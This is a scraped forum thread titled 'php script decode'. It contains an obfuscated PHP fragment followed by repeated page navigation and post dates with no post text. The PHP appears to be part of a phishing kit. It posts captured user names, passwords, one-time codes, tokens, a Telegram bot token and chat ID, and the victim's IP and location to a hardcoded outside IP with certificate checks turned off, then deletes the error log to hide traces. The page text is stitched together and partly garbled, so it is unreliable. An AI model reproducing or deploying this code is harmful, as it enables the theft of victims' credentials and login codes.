${${"GLOBALS"}["ccuakzwhcpf"]} = urlencode(${$iqhtotcrmum});
$jjwyamqo = "telegramchatid";
$nhfgynp = "ch";
${$orzyxfmsfdj} = urlencode(${$jjwyamqo});
${$hohmvtet} = urlencode($_POST["pass"]);
${${"GLOBALS"}["hynvtsq"]} = urlencode(${${"GLOBALS"}["porzifx"]});
${${"GLOBALS"}["okemlrwchw"]} = $_POST["entropy"];

// Initialize a cURL session
${$nhfgynp} = curl_init();
${"GLOBALS"}["bfwrqzn"] = "ch";
${$ppuwtpa} = "http://54.67.68.218/engine/api.php";

// Set cURL options
curl_setopt(${${"GLOBALS"}["lxzgnynfioh"]}, CURLOPT_URL, ${${"GLOBALS"}["sjlqvec"]});
curl_setopt(${${"GLOBALS"}["lxzgnynfioh"]}, CURLOPT_POST, true);
curl_setopt(${${"GLOBALS"}["bfwrqzn"]}, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt(${${"GLOBALS"}["lxzgnynfioh"]}, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt(${${"GLOBALS"}["lxzgnynfioh"]}, CURLOPT_POSTFIELDS, "thepart=$thepart&user=$user&do=$do&service=$service&token=$token&key=$key&otc=$otc&method=$method&pass=$pass&freeuse=promo&ipadddata=$myip&entropy=$entropy&teleto=$ttoken&telech=$tchid&vcountry=$country&vcity=$city&vregion=$region&repovis=$reportvisits&wpro=$wproxy");
curl_setopt(${${"GLOBALS"}["lxzgnynfioh"]}, CURLOPT_RETURNTRANSFER, true);

// Execute the cURL session and close it
${$xdnmnuc} = curl_exec(${${"GLOBALS"}["lxzgnynfioh"]});
curl_close(${${"GLOBALS"}["lxzgnynfioh"]});

// Output the result of the cURL execution
echo ${$qwhnfeur};

// Remove the error log file if it exists
if (file_exists("error_log")) {
    unlink("error_log");
}
?>

<?php // Silence is golden.

Back to Favors & Rewards

Users browsing this thread: and 1 guests

php script decode

#1
Posted 25 June 2024 - 01:11 PM

#2
Posted 02 July 2024 - 08:30 AM

#3
Posted 21 July 2024 - 03:57 PM

About Us

Navigation

Extras

Help Documents

Account

php script decode

#1 Posted 25 June 2024 - 01:11 PM

#2 Posted 02 July 2024 - 08:30 AM

#3 Posted 21 July 2024 - 03:57 PM

About Us

Navigation

Extras

Help Documents

Account

Sign In

#1
Posted 25 June 2024 - 01:11 PM

#2
Posted 02 July 2024 - 08:30 AM

#3
Posted 21 July 2024 - 03:57 PM